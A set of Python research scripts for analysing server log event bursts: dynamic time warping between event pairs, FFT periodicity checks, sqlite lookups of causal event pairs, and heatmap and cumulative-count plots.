import numpy as np
import search_burst as sb
import sqlite3
import collections
import datetime
import pickle
def dtw_distance(ts_a, ts_b, d=lambda x, y: abs(x-y), window=0):
if window <= 0:
window = max(len(ts_a), len(ts_b))
ts_a_len = len(ts_a)
ts_b_len = len(ts_b)
cost = np.empty((ts_a_len, ts_b_len))
dist = np.empty((ts_a_len, ts_b_len))
cost[0][0] = dist[0][0] = d(ts_a[0], ts_b[0])
for i in range(1, ts_a_len):
cost[i][0] = d(ts_a[i], ts_b[0])
dist[i][0] = dist[i-1, 0] + cost[i, 0]
for j in range(1, ts_b_len):
cost[0][j] = d(ts_a[0], ts_b[j])
dist[0][j] = dist[0, j-1] + cost[0, j]
for i in range(1, ts_a_len):
windowstart = max(1, i-window)
windowend = min(ts_b_len, i+window)
for j in range(windowstart, windowend):
cost[i][j] = d(ts_a[i], ts_b[j])
dist[i][j] = min(dist[i-1][j], dist[i][j-1], dist[i-1][j-1]) + cost[i][j]
return dist[ts_a_len-1][ts_b_len-1]
def get_eday(evp):
argv = []
argv.extend(evp[0].split("_"))
argv.extend(evp[1].split("_"))
query='select date from date where pairID in(select pairID from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}"));'.format(argv[0],argv[1],argv[2],argv[3])
cur.execute(query)
r = cur.fetchall()
result = []
for i in r:
result.append("".join(i[0].split("-")))
return result
def get_log(DUMP_NAME,DATE):
obj = sb.open_dump('dumps/'+str(DATE)+'/'+DUMP_NAME)
return(obj)
def vect(ev):
x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(ev))]
y = [0]
for row in sorted(collections.Counter(ev).items(),key=lambda z:z[0]):
y.append(row[1]+y[-1])
y = y[1:]
x = np.array(x)
y = np.array(y)/np.max(y)
return np.array([x,y])
def check_synm(evp,anddays):
res = []
for day in anddays:
ev1 = get_log(evp[0],day)
lev1 = len(ev1)
ev2 = get_log(evp[1],day)
lev2 = len(ev2)
vev1 = vect(ev1)
vev2 = vect(ev2)
if evp[0] == '117_tokyo-dc-rm' and evp[1] == '116_tokyo-dc-rm':
print(ev1,ev2)
dtw = dtw_distance(vev1.T, vev2.T, lambda x,y: np.linalg.norm(x-y))
# dtw = dtw_distance(vev1[0],vev2[0])
res.append((evp,day,dtw))
return res
if __name__ == "__main__":
dbname = 's4causality.db'
conn = sqlite3.connect(dbname)
cur = conn.cursor()
edge_burst = sb.open_dump('rp_edge_coburst')
burst = sb.open_dump('burst_df')
burst_ev = [x for x in burst.columns if len(burst[x].dropna()) != 0]
result = []
for evp in edge_burst['EvPair']:
bday1 = burst[evp[0]].dropna().index.values
bday1 = [str(x).split('T')[0].replace("-","") for x in bday1]
bday2 = burst[evp[1]].dropna().index.values
bday2 = [str(x).split('T')[0].replace("-","") for x in bday2]
bday = list(set(bday1) & set(bday2))
eday = get_eday(evp)
if len(set(bday) & set(eday)) != 0:
anddays = list(set(bday) & set(eday))
res = check_synm(evp,anddays)
result.append(res)
print(result)
with open('edge_dtw_xxy','wb') as f:
pickle.dump(result,f)
--- FILE SEPARATOR ---
import sqlite3
import numpy as np
import pandas as pd
import search_burst as sb
import pickle
def search_pair_query(id1,host1,id2,host2):
query='select date from date where pairID in(select pairID from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}"));'.format(id1,host1,id2,host2)
return query
if __name__ == "__main__":
co_prob_df = sb.open_dump('co_prob_df')
dbname = 's4causality.db'
conn = sqlite3.connect(dbname)
cur = conn.cursor()
edge_coburst_pair = []
for row in co_prob_df['EvPair'].values:
id1,host1 = row[0].split('_')
id2,host2 = row[1].split('_')
q = search_pair_query(id1,host1,id2,host2)
cur.execute('''{}'''.format(q))
q_result = cur.fetchall()
if len(q_result) != 0 :
edge_coburst_pair.append(row)
else:
pass
edge_coburst_index = pd.Series([False]*co_prob_df.shape[0],index=co_prob_df.index)
for i in edge_coburst_pair:
edge_coburst_index |= co_prob_df['EvPair']==i
with open('rp_edge_coburst','wb') as f:
pickle.dump(co_prob_df[edge_coburst_index],f)
# cur.execute('''create table date (id integer primary key, pairID integer, date text)''')
# for row in event_df.iterrows():
# cur.execute('''select pairID from event where srcID={0[0]} and srcHost="{0[1]}" and dstID={0[2]} and dstHost="{0[3]}" and direction={0[4]}'''.format(row[1].values[:5]))
# pairID = cur.fetchall()[0][0]
# cur.execute('''insert into date(pairID, date) values({0},"{1}")'''.format(pairID, row[1].values[-1]))
#
# conn.commit()
# conn.close()
--- FILE SEPARATOR ---
import pickle
import datetime
import sys
import glob
import search_burst as sb
'''
event別dumpファイルをhostごとに集約
python event_agg.py prefix
prefix以下が、
prefix/0000-0499/hoge.dump
'''
days = [i.split('/')[-1] for i in glob.glob('dumps/*')]
for day in days:
hosts = set([i.split('_')[-1] for i in glob.glob('dumps/{0}/*'.format(day))])
for host in hosts:
files = glob.glob('dumps/{0}/*_{1}'.format(day,host))
host_data = []
for fi in files:
host_data.extend(sb.open_dump(fi))
with open('dumps_host/{0}/{1}'.format(day,day+'_'+host),'wb') as f:
pickle.dump(host_data,f)
# # files = glob.glob('dump_files/0000-0499/*_tokyo-dc-rm.dump') # ワイルドカードが使用可能
# files = glob.glob('{0}/*-*/*'.format(PREFIX)) # ワイルドカードが使用可能
#
# host_list = []
# for fi in files:
# host_list.append(fi.split('/')[-1].split('.')[0].split('_')[1])
#
# print(set(host_list),len(set(host_list)))
# #
# # with open("host_list.txt","w") as f:
# # for i in set(host_list):
# # f.write(str(i))
# # f.write("\n")
# #
# # exit()
#
#
# for host in set(host_list):
#
# # パス内の全ての"指定パス+ファイル名"と"指定パス+ディレクトリ名"を要素とするリストを返す
# files = glob.glob('{0}/*-*/*_{1}.dump'.format(PREFIX,host)) # ワイルドカードが使用可能
#
# all_event = []
#
# for fi in files:
# with open(fi,"rb") as f:
# obj = pickle.load(f, encoding="bytes")
#
# # all_num += len(obj)
# all_event.extend(obj)
#
# with open(host + '.dump','wb') as f:
# pickle.dump(all_event,f)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from scipy import arange, hamming, sin, pi
from scipy.fftpack import fft, ifft, fftfreq
import matplotlib.pyplot as plt
import search_burst as sb
import numpy as np
import pandas as pd
import sys
import datetime
event = sb.open_dump(sys.argv[1])
day = sys.argv[2]
ev_year = int(day[:4])
ev_month = int(day[4:6])
ev_day = int(day[6:8])
ev_date = datetime.date(ev_year,ev_month,ev_day)
plot_data = [row.time() for row in event if row.date() == ev_date]
ev_data = [row.hour*3600 + row.minute*60 + row.second for row in plot_data]
fs = 1 # Sampling rate
L = 2**16 # Signal length
x = [10. if i in ev_data else 0. for i in range(L)]
# test data
# x = [10. if i%3600 == 0 else 0. for i in range(L)]
# # 440[Hz]のサイン波を作る。
# sine_440 = sin(2. * pi * arange(L) * 440. / fs)
# # 600[Hz]のサイン波を作る。
# sine_600 = 2 * sin(2. * pi * arange(L) * 600. / fs)
# # 800[Hz]のサイン波を作る。
# sine_800 = 3 * sin(2. * pi * arange(L) * 800. / fs)
#
# # 全部足す
# sig = sine_440 + sine_600 + sine_800
#
# print(sig);exit()
# 窓関数
win = hamming(L)
# # フーリエ変換
# spectrum_nw = fft(sig) # 窓関数なし
# spectrum = fft(sig * win) # 窓関数あり
# half_spectrum_nw = abs(spectrum_nw[: L / 2 + 1])
# half_spectrum = abs(spectrum[: L / 2 + 1])
spectrum = fft(x * win)
freq = fftfreq(L,fs)
half_spectrum = abs(spectrum[1:int(L / 2)])
# # フーリエ逆変換
# resyn_sig = ifft(spectrum)
# resyn_sig /= win
# 図を表示
fig = plt.figure(figsize=(10,10))
fig.add_subplot(211)
plt.plot(x)
plt.xlim([0, L])
plt.title("1. Input signal", fontsize = 20)
fig.add_subplot(212)
# plt.plot(half_spectrum)
plt.plot(freq[1:int(L/2)], half_spectrum)
plt.xlim([0, 10**(-3)])
# plt.xscale('log')
plt.title("2. Spectrum (no window)", fontsize = 20)
plt.savefig('fft.png')
--- FILE SEPARATOR ---
import pickle
import sqlite3
import datetime
import sys
DUMP_FILE = sys.argv[1]
with open(DUMP_FILE) as f:
obj = pickle.load(f)
for evdef, times in obj.items():
event_name = str(evdef.gid) + '_' + evdef.host
print(event_name)
with open(event_name+'.dump','wb') as f:
pickle.dump(times,f)
--- FILE SEPARATOR ---
#!/usr/bin/python
import numpy as np
import pandas as pd
import datetime
import search_burst as sb
import plot_day
import pickle
import search_burst as sb
import sqlite3
import glob
'''
log情報を得るやつ
'''
def cnt_logs(DUMP_NAME,DATE):
obj = sb.open_dump(DUMP_NAME)
return(len(obj))
def get_eday(evp):
argv = []
argv.extend(evp[0].split("_"))
argv.extend(evp[1].split("_"))
# print(argv)
query='select date from date where pairID in(select pairID from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}"));'.format(argv[0],argv[1],argv[2],argv[3])
cur.execute(query)
r = cur.fetchall()
# print(r)
result = []
for i in r:
result.append("".join(i[0].split("-")))
return result
if __name__ == "__main__":
dates = [x.split('/')[-1] for x in glob.glob('dumps/*')]
av_cnt = np.array([])
for date in dates:
files = glob.glob('dumps/{0}/*'.format(date))
date_log_cnt = 0
for fi in files:
date_log_cnt += cnt_logs(fi,date)
av_cnt = np.append(av_cnt, date_log_cnt)
print(np.average(av_cnt))
--- FILE SEPARATOR ---
# args: conf, ltgid
import sys
from logcausality import log_db
from logcausality import lt_label
conf = sys.argv[0]
ltgid = sys.argv[1]
ld = log_db.LogData(conf)
ll = lt_label.init_ltlabel(conf)
label = ll.get_ltg_label(ltgid, ld.ltg_members(ltgid))
group = ll.get_group(label)
print(group)
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
'''
引数で与えられたdumpファイルの全体のヒートマップを描画
python heat_map.py xx.dump yy.dump ...
'''
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import pickle
import sys
import datetime
import collections
def print_full(x):
pd.set_option('display.max_rows', len(x))
pd.set_option('display.max_columns',len(x.columns))
print(x)
pd.reset_option('display.max_rows')
pd.reset_option('display.max_columns')
if __name__ == "__main__":
values = []
dn_list = []
for dn in sys.argv[1:]:
DUMP_NAME = dn
dn_list.append(dn.split('/')[-1])
with open(DUMP_NAME,"rb") as f:
obj = pickle.load(f, encoding="bytes")
tmp = set( [datetime.datetime(row.year,row.month,row.day) for row in obj ] )
x = sorted(list(tmp))
# Y軸データ
y = sorted(collections.Counter([row.date() for row in obj]).items(),key=lambda x:x[0])
y = [row[1] for row in y]
x = [str(z.strftime('%Y-%m-%d')) for z in x]
z = {str(k)[:10]:0 for k in pd.date_range("20120101",periods=456)}
for i,j in zip(x,y):
z[i]=j
values.append([i[1] for i in sorted(z.items(),key=lambda x:x[0])][:456])
df = pd.DataFrame(values,columns=pd.date_range("20120101",periods=456),index=dn_list)
print_full(df)
# x:date y:eventID のヒートマップ
#default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
fig = plt.figure(figsize=(25,18))
fig.subplots_adjust(right=0.999)
# ax = fig.add_subplot(111)
sns.heatmap(df,cmap="Reds")
print(x)
plt.xticks([0,31,59,90,120,151,181,212,243,273,304,334,365,396,426,457],[datetime.date(2012,i,1) for i in range(1,13)]+[datetime.date(2013,i,1) for i in range(1,4)],fontsize='20')
plt.yticks(fontsize='15',rotation='0')
plt.grid()
plt.savefig(dn_list[0].split('_')[0]+'.png')
--- FILE SEPARATOR ---
import pickle
import datetime
import sys
import glob
import collections
import pandas as pd
import numpy as np
'''
hostの全集計dfのdump生成
python host_pandas.py
'''
# PREFIX = sys.argv[1]
def print_full(x):
pd.set_option('display.max_rows', len(x))
pd.set_option('display.max_columns', len(x.columns))
print(x)
pd.reset_option('display.max_rows')
pd.reset_option('display.max_columns')
# files = glob.glob('dump_files/0000-0499/*_tokyo-dc-rm.dump') # ワイルドカードが使用可能
files = glob.glob('{0}/*-*/*'.format(PREFIX)) # ワイルドカードが使用可能
host_list = []
for fi in files:
host_list.append(fi.split('/')[-1].split('.')[0].split('_')[1])
for host in set(host_list):
# パス内の全ての"指定パス+ファイル名"と"指定パス+ディレクトリ名"を要素とするリストを返す
files = glob.glob('{0}/*-*/*_{1}.dump'.format(PREFIX,host)) # ワイルドカードが使用可能
df_tmp = pd.DataFrame(index=pd.date_range('20120101','20130331'), columns=np.arange(1789))
for fi in files:
tmp_id = int(fi.split('/')[-1].split('_')[0])
with open(fi,"rb") as f:
obj = pickle.load(f, encoding="bytes")
tmp = set( [datetime.datetime(row.year,row.month,row.day) for row in obj ] )
x = sorted(list(tmp))
# Y軸データ
y = sorted(collections.Counter([row.date() for row in obj]).items(),key=lambda x:x[0])
y = [row[1] for row in y]
for ind,val in zip(x,y):
df_tmp.loc[ind,tmp_id] = val
with open(host + '_df.dump','wb') as f:
pickle.dump(df_tmp,f)
--- FILE SEPARATOR ---
import pickle
import datetime
import sys
import glob
import collections
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# import search_burst as sb
'''
特定の日の、ID別プロット
no option:
python host_plot_day.py tokyo-dc-rm_df.dump 20120101 prefix
./prefix/0000-0499/イベント別データ
のファイル構造から、自動で、入力日の上位10件の発生イベントを拾ってきてプロットする
option: a
python host_plot_day.py a tokyo-dc-rm_df.dump burst_result prefix"
burst_resultからバーストが検知された日を抽出し、
./prefix/0000-0499/イベント別データ
のファイル構造から、自動で、入力日の上位10件の発生イベントを拾ってきて、全日プロットする
'''
def create_xy(dump_name,get_date):
#特定日の累積和プロット用の階段処理してあるx, yを生成
obj = open_dump(dump_name)
plot_year = int(get_date[:4])
plot_month = int(get_date[4:6])
plot_day = int(get_date[6:8])
plot_date = datetime.date(plot_year,plot_month,plot_day)
plot_data = [row.time() for row in obj if row.date() == plot_date]
plot_data_coll = collections.Counter(plot_data)
x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
y = [0]
for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
y.append(row[1]+y[-1])
y = y[1:]
x = np.sort(np.append(x,x))[1:]
x = np.insert(x,0,x[0])
tmp = []
for row in y:
tmp.append(row)
tmp.append(row)
y = tmp[:-1]
y = [0] + y
if x[-1] != 86399:
x = np.append(x,86399)
y = np.append(y,y[-1])
return (x,y)
def print_full(x):
pd.set_option('display.max_rows', len(x))
pd.set_option('display.max_columns', len(x.columns))
print(x)
pd.reset_option('display.max_rows')
pd.reset_option('display.max_columns')
def open_dump(dump_file):
with open(dump_file,"rb") as f:
obj = pickle.load(f, encoding="bytes")
return obj
def get_most_ids(host,get_date):
#dfから特定日の大量発生しているIDを降順に取得 -> ids
# id_sr = df.loc[get_date]
# id_sr = id_sr.sort_values(inplace=False, ascending=False)
# id_sr = id_sr.dropna()
#
# ids = id_sr.index
ids = []
for i in glob.glob('dumps/{0}/*_{1}'.format(get_date,host)):
# if i.split("_")[-1] == host:
ids.append((i.split("/")[-1].split("_")[0],len(open_dump(i))))
sorted(ids,key=lambda x:x[1],reverse=True)
return ids
def burst2get_dates(burst_file):
get_dates = []
for line in open(burst_file,"r"):
if line[0] == '(':
get_date = "".join([a.strip().zfill(2) for a in line[1:-2].split(",")])
get_dates.append(get_date)
else:
continue
return get_dates
if __name__ == "__main__":
if len(sys.argv) < 3:
print("usage:\npython host_plot_day.py tokyo-dc-rm_df.dump 20120101 prefix")
print("python host_plot_day.py a tokyo-dc-rm_df.dump burst_result.txt prefix")
exit()
if sys.argv[1] == 'a':
dump_name = sys.argv[2]
burst_file = sys.argv[3]
prefix = sys.argv[4]
get_dates = burst2get_dates(burst_file)
else:
host = sys.argv[1]
get_dates = [sys.argv[2]]
# prefix = sys.argv[3]
if sys.argv[-1] == 'p':
for_paper_plot = 1
else:
for_paper_plot = 0
colors = ['red','orange','y','lightgreen','green','lightblue','blue','purple','gray','black']
# df = open_dump(dump_name)
# host_name = dump_name.split("/")[-1].split('_')[0]
# print(host_name)
# print(get_dates)
if for_paper_plot == 1:
for get_date in get_dates:
ids = get_most_ids(host,get_date)
# データをセット
fig = plt.figure(figsize=(10,6))
#default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
# fig.subplots_adjust(left=0.03,right=0.999)
fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15,right=0.87)
ax = fig.add_subplot(111)
for cnt,(idd,num) in enumerate(ids):
if cnt > 4:
break
# id_host = str(idd) + '_' + host_name + '.dump'
print(get_date,idd)
x,y = create_xy('dumps/'+get_date+'/'+idd+'_'+host, get_date)
print(idd,y[-1])
plt.plot(x, y,label=cnt+1,color=colors[cnt], lw=1.5)
#総計データのプロット
x, y = create_xy("dumps_host/"+get_date+'/'+get_date+'_'+host,get_date)
plt.plot(x, y, "-.", label='all', color="black", lw=1.5)
# tmp=[[1860,20545],]
# tmp=[[43200,48326],[79468,81482]]
# for st,en in tmp:
# plt.fill([st,en,en,st], [0,0,max(y)*1.5,max(y)*1.5], color='#DBDBDB', alpha=0.8)
# sts = [4676,7227,63856,68989]; burst_cnt = 0
# for st in sts:
# color=['red','orange']
# if burst_cnt < 2:
# plt.plot([st,st], [0,max(y)*1.05], "--", color=color[burst_cnt%2], lw=3., label=['Burst\nstart','Burst\nend'][burst_cnt%2])
# burst_cnt +=1
# else:
# plt.plot([st,st], [0,max(y)*1.05], "--", color=color[burst_cnt%2], lw=3.)
# burst_cnt +=1
plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2) for i in range(25)],rotation=90,fontsize='20')
plt.xlim(0,86400)
plt.yticks(fontsize='25')
plt.xlabel('time', fontsize='23')
ax.xaxis.set_label_coords(0.5, -0.13)
ax.set_ylabel('Cumulative Count', fontsize='23')
ax.yaxis.set_label_coords(-0.15, 0.5)
plt.ylim(0,max(y)*1.05)
# plt.ylabel('Cumulative Count', fontsize='20', x=-50000)
plt.grid()
plt.legend(prop={'size':13},bbox_to_anchor=(1.01, 1), loc='upper left', borderaxespad=0)
# plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
plt.savefig(host + get_date + '_fp.eps')
else:
for get_date in get_dates:
ids = get_most_ids(df,get_date)
# データをセット
fig = plt.figure(figsize=(30,10))
#default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
fig.subplots_adjust(left=0.03,right=0.999)
for cnt,idd in enumerate(ids):
if cnt > 9:
break
id_host = str(idd) + '_' + host_name + '.dump'
if idd < 500:
id_host_path = prefix + "/0000-0499/" + id_host
elif idd < 1000:
id_host_path = prefix + "/0500-0999/" + id_host
elif idd < 1500:
id_host_path = prefix + "/1000-1499/" + id_host
else:
id_host_path = prefix + "/1500-1999/" + id_host
x,y = create_xy(id_host_path,get_date)
print(idd,y[-1])
plt.plot(x, y,label=idd,color=colors[cnt], lw=3)
#総計データのプロット
x, y = create_xy("host_dump/"+host_name+".dump",get_date)
plt.plot(x, y, "--", label='all', color="black", lw=3)
plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2)+':00\n{0}'.format(i*3600) for i in range(25)],rotation=90)
plt.xlim(0,86400)
plt.grid()
plt.legend()
# plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
plt.savefig(host_name + get_date + '.png')
--- FILE SEPARATOR ---
import search_burst as sb
import numpy as np
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import datetime
import collections
import pickle
import plot_day
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from scipy import arange, hamming, sin, pi
from scipy.fftpack import fft, ifft, fftfreq
import matplotlib.pyplot as plt
import search_burst as sb
import numpy as np
import pandas as pd
import sys
import datetime
import collections
import glob
# 誤差が高いほど周期関係ない
def linear_rms(event, ev_day):
day = ev_day
ev_year = int(day[:4])
ev_month = int(day[4:6])
ev_day = int(day[6:8])
ev_date = datetime.date(ev_year,ev_month,ev_day)
ev_data = [row.time() for row in event if row.date() == ev_date]
ev_data_coll = collections.Counter(ev_data)
x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(ev_data))]
if len(x) < 10:
return 1
y = [0]
for row in sorted(ev_data_coll.items(),key=lambda z:z[0]):
y.append(row[1]+y[-1])
y = y[1:]
a=len(ev_data)/86400
linx=x
liny=[a * i for i in linx]
# print(ev_data[:40])
#
# for e in range(len(y)):
# print(x[e],y[e],liny[e])
return sum([ abs(a-b) for a,b in zip(liny,y) ]) / len(liny) / len(ev_data)
def get_dump_path(ev_name):
pf = './'
temp_id = int(ev_name.split('_')[0])
if temp_id < 500:
return pf + '0000-0499/' + ev_name + '.dump'
elif temp_id < 1000:
return pf + '0500-0999/' + ev_name + '.dump'
elif temp_id < 1500:
return pf + '1000-1499/' + ev_name + '.dump'
else:
return pf + '1500-1999/' + ev_name + '.dump'
if __name__ == "__main__":
if len(sys.argv) == 3:
dump = sys.argv[1]
ev_day = sys.argv[2]
event = sb.open_dump(dump)
print(linear_rms(event, ev_day))
else:
burst_df = sb.open_dump(sys.argv[1])
for i in burst_df.iteritems():
tmp = i[1].dropna()
if len(tmp) != 0 :
print(tmp.name)
dump_name = get_dump_path(tmp.name)
event = sb.open_dump(dump_name)
for ev_day in tmp.index:
rms = linear_rms(event, ev_day.strftime('%Y%m%d'))
if not rms > 0.1:
print(ev_day,'\t',rms)
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
'''
dumpから日毎の累積度数をプロット
python plot.py xxxx
'''
import collections
import sys
import numpy as np
import matplotlib.pyplot as plt
import pybursts
import datetime
import matplotlib.dates as mdates
import pickle
import plot_day
import glob
import search_burst as sb
def burst2get_data(burst_file):
get_data = collections.defaultdict(lambda: 0)
for line in open(burst_file,"r"):
if line[0] == '(':
get_date = "".join([a.strip().zfill(2) for a in line[1:-2].split(",")])
get_data[get_date] = []
elif line.strip()[0] == "[":
st = line.strip()[1:-2].split(",")[1].strip()
en = line.strip()[1:-2].split(",")[2].strip()
get_data[get_date].append((float(st),float(en)))
return get_data
event = sys.argv[1]
files = glob.glob('dumps/*/{}'.format(event))
x = []
y = []
for fi in files:
data = sb.open_dump(fi)
print(data[0].date(),":",len(data))
x.append(data[0].date())
y.append(len(data))
# DUMP_NAME = sys.argv[1]
# if len(sys.argv) > 2:
# PLOT_BURST = int(sys.argv[2])
# else:
# PLOT_BURST = 0
#
# with open(DUMP_NAME,"rb") as f:
# obj = pickle.load(f, encoding="bytes")
#
# tmp = set( [datetime.datetime(row.year,row.month,row.day) for row in obj ] )
# x = sorted(list(tmp))
#
# # Y軸データ
# y = sorted(collections.Counter([row.date() for row in obj]).items(),key=lambda x:x[0])
# y = [row[1] for row in y]
#
# データをセット
fig = plt.figure(figsize=(30,10))
# ax = fig.add_subplot(111)
fig.subplots_adjust(left=0.03,right=0.995)
plt.bar(x, y, color='b',edgecolor='b')
xticks_label = [datetime.date(2012,i,1)for i in range(1,13)] + [datetime.date(2013,i,1) for i in range(1,5)]
plt.xticks(xticks_label,xticks_label)
plt.xlim(xticks_label[0],xticks_label[-1])
plt.grid(b=True, which='major',color='black',lw='1')
# print(DUMP_NAME.split('/')[-1].split('.')[0]+'.png')
plt.savefig(event+'.png')
#
# if PLOT_BURST == 1:
# burst_days=burst2get_data('burst_rplinear_0000-0499/'+DUMP_NAME.split('/')[-1]+'.txt').keys()
# print(burst_days)
#
# for burst_day in burst_days:
# plot_day.plot_day(DUMP_NAME,burst_day)
#
#
# exit()
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
'''
指定日のプロットを行う
累積和、移動平均つき
python plot_day.py xxxx.dump 20120101
'''
import collections
import sys
import numpy as np
import matplotlib.pyplot as plt
import pybursts
import datetime
import matplotlib.dates as mdates
import pickle
# import search_burst as sb
import os.path
def open_dump(dump_file):
with open(dump_file, "rb") as f:
obj = pickle.load(f, encoding="bytes")
return obj
def get_dump_path(DUMP_NAME, DATE):
path = 'dumps/'+DATE+'/'+DUMP_NAME
if os.path.exists(path):
return path
else:
print('file not exist')
exit()
def plot_day(DUMP_NAME, DATE):
if "/" in DUMP_NAME:
obj = open_dump(DUMP_NAME)
else:
obj = open_dump(get_dump_path(DUMP_NAME,DATE))
plot_year = int(DATE[:4])
plot_month = int(DATE[4:6])
plot_day = int(DATE[6:8])
plot_date = datetime.date(plot_year,plot_month,plot_day)
plot_data = [row for row in obj if row.date() == plot_date]
# print(plot_data)
# plot_data = [row.time() for row in obj if row.date() == plot_date]
plot_data = [row.time() for row in obj]
plot_data_coll = collections.Counter(plot_data)
x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
y = [0]
for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
y.append(row[1]+y[-1])
y = y[1:]
# 階段状にする処理
x = np.sort(np.append(x,x))[1:]
x = np.insert(x,0,x[0])
tmp = []
for row in y:
tmp.append(row)
tmp.append(row)
y = tmp[:-1]
y = [0] + y
# plot
fig = plt.figure(figsize=(30,10))
#default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
fig.subplots_adjust(left=0.03,right=0.999)
plt.title(DUMP_NAME+"\t"+DATE)
plt.plot(x, y)
plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2)+':00\n{0}'.format(i*3600) for i in range(25)],fontsize=25,rotation=90)
plt.yticks(fontsize=25)
plt.xlim(0,86400)
# plt.grid()
# plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
plt.show()
def plot_day_old(DUMP_NAME, DATE):
obj = open_dump(DUMP_NAME)
plot_year = int(DATE[:4])
plot_month = int(DATE[4:6])
plot_day = int(DATE[6:8])
plot_date = datetime.date(plot_year,plot_month,plot_day)
plot_data = [row for row in obj if row.date() == plot_date]
print(plot_data)
# plot_data = [row.time() for row in obj if row.date() == plot_date]
plot_data = [row.time() for row in obj]
plot_data_coll = collections.Counter(plot_data)
x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
y = [0]
for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
y.append(row[1]+y[-1])
y = y[1:]
# 階段状にする処理
x = np.sort(np.append(x,x))[1:]
x = np.insert(x,0,x[0])
tmp = []
for row in y:
tmp.append(row)
tmp.append(row)
y = tmp[:-1]
y = [0] + y
# データをセット
fig = plt.figure(figsize=(12,8))
#default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15)
ax = fig.add_subplot(111)
plt.plot(x, y, lw=3)
plt.xticks([i*3600 for i in range(25)][::2],[str(i).zfill(2) for i in range(25)][::2],rotation=90,fontsize='20')
plt.yticks(fontsize='25')
# print(x)
# for st in set(x):
# plt.plot([st,st], [0,max(y)*1.05], "--", color='red', alpha=0.3)
# plt.bar(st, max(y)*1.05)
# plt.plot([en,en], [0,max(y)*1.05], "--", color='orange', alpha=0.3)
# plt.fill([st,en,en,st], [0,0,max(y)*1.05,max(y)*1.05], color='#D0D0D0', alpha=0.1)
# plt.fill([st,en,en,st], [0,0,max(y)*1.05,max(y)*1.05], color='#505050', alpha=0.1)
plt.xlabel('time', fontsize='23')
ax.xaxis.set_label_coords(0.5, -0.13)
ax.set_ylabel('Cumulative Count', fontsize='23')
plt.xlim(0,86400)
plt.ylim(0,max(y)*1.05)
plt.grid()
plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
def plot_day_fp(DUMP_NAME, DATE):
obj = open_dump(get_dump_path(DUMP_NAME,DATE))
plot_year = int(DATE[:4])
plot_month = int(DATE[4:6])
plot_day = int(DATE[6:8])
plot_date = datetime.date(plot_year,plot_month,plot_day)
plot_data = [row for row in obj if row.date() == plot_date]
plot_data = [row.time() for row in obj if row.date() == plot_date]
plot_data_coll = collections.Counter(plot_data)
x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
y = [0]
for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
y.append(row[1]+y[-1])
y = y[1:]
# 階段状にする処理
x = np.sort(np.append(x, x))[1:]
x = np.insert(x, 0, x[0])
x = np.append(x, 86399)
tmp = []
for row in y:
tmp.append(row)
tmp.append(row)
y = tmp[:-1]
y = [0] + y + [y[-1]]
# データをセット
fig = plt.figure(figsize=(12,8))
#default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15)
# for st,en in tmp:
# plt.plot([st,st], [0,max(y)*1.05], "--", color='red', alpha=0.3)
# plt.bar(st, max(y)*1.05)
# plt.plot([en,en], [0,max(y)*1.05], "--", color='orange', alpha=0.3)
# plt.fill([st,en,en,st], [0,0,max(y)*1.05,max(y)*1.05], color='#D0D0D0', alpha=0.1)
# plt.fill([st,en,en,st], [0,0,max(y)*1.05,max(y)*1.05], color='#505050', alpha=0.1)
ax = fig.add_subplot(111)
plt.title(DUMP_NAME+"\t"+DATE)
plt.plot(x, y, lw=3)
plt.xticks([i*3600 for i in range(25)][::2],[str(i).zfill(2) for i in range(25)][::2],rotation=90,fontsize='20')
# plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2) for i in range(25)],rotation=90,fontsize='20')
plt.yticks(fontsize='25')
# plt.title('Ex.5', fontsize='20')
plt.xlabel('time', fontsize='23')
ax.xaxis.set_label_coords(0.5, -0.13)
ax.set_ylabel('Cumulative Count', fontsize='23')
# ax.yaxis.set_label_coords(-0.15, 0.5)
# plt.ylabel('Cumulative Count', fontsize='20', x=-50000)
plt.xlim(0,86400)
